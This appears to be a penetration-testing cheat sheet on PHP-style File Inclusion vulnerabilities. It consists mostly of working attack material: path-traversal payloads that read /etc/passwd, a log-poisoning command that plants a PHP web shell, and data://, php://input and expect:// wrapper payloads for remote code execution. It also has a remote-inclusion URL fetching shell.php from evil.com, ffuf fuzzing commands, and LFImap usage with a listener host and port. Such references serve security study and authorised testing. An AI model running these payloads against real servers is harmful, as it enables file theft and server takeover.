File Inclusion

Notes about some basic File Inclusion attacks

Playground

Dangerous Function

Language | Function                 | Read Content | Execute | Remote URL
---------|--------------------------|--------------|---------|-----------
PHP      | include()/include_once() | ✅           | ✅      | ✅
PHP      | require()/require_once() | ✅           | ✅      | ❌
PHP      | file_get_contents()      | ✅           | ❌      | ✅
PHP      | fopen()/file()           | ✅           | ❌      | ❌
NodeJS   | fs.readFile()            | ✅           | ❌      | ❌
NodeJS   | fs.sendFile()            | ✅           | ❌      | ❌
NodeJS   | res.render()             | ✅           | ✅      | ❌
Java     | include                  | ✅           | ❌      | ❌
Java     | import                   | ✅           | ✅      | ✅
.NET     | @Html.Partial()          | ✅           | ❌      | ❌
.NET     | @Html.RemotePartial()    | ✅           | ❌      | ✅
.NET     | Response.WriteFile()     | ✅           | ❌      | ❌
.NET     | include                  | ✅           | ✅      | ✅

Local File Inclusion (LFI)

Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.

Basic LFI Payloads

Payload                                                 | Description
--------------------------------------------------------|-------------------------
/etc/passwd                                             | Basic LFI
../../../../etc/passwd                                  | LFI with path traversal
/../../../etc/passwd                                    | LFI with name prefix
./languages/../../../../etc/passwd                      | LFI with approved path
php://filter/read=convert.base64-encode/resource=config | LFI with Base64 filter
../../../../etc/passwd%00                               | LFI with null byte

Log Poisoning to RCE

# Inject Access Log
curl -X "<?php echo passthru(\$_GET['cmd']);?>" http://target.com/

# Access
http://target.com/index.php?page=/var/log/apache2/access.log&cmd=id

Access Log Location

Apache:

/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log

Nginx:

  • /var/log/nginx/access.log

LFI to RCE

# Data Wrappers
http://target.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

# Input Wrappers
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://target.com/index.php?page=php://input&cmd=id"

# Expect Wrappers
curl -s "http://target.com/index.php?page=expect://id"

Remote File Inclusion (RFI)

In most languages, including remote URLs is considered a dangerous practice because it enables exactly this kind of vulnerability. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP requires the allow_url_include setting to be enabled.

http://target.com/index.php?page=ftp://user:pass@localhost/shell.php&cmd=id
http://target.com/index.php?page=http://evil.com/shell.php&cmd=id

Automation

# Fuzzing Parameter
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://target.com/index.php?FUZZ=value' -fs 2309

# Check working payload with LFI wordlists
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://target.com/index.php?view=FUZZ' -fs 2309

# Read Apache2 Conf
curl http://target.com/index.php?view=../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf

Tools

LFImap

# Install
git clone https://github.com/hansmach1ne/LFImap
cd LFImap/
python3 -m venv lfimap_env
source lfimap_env/bin/activate
pip3 install -r requirements.txt

# Usage
python3 lfimap.py --help
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -a
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -x --lhost 10.9.245.106 --lport 443

WordLists

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows

  • https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
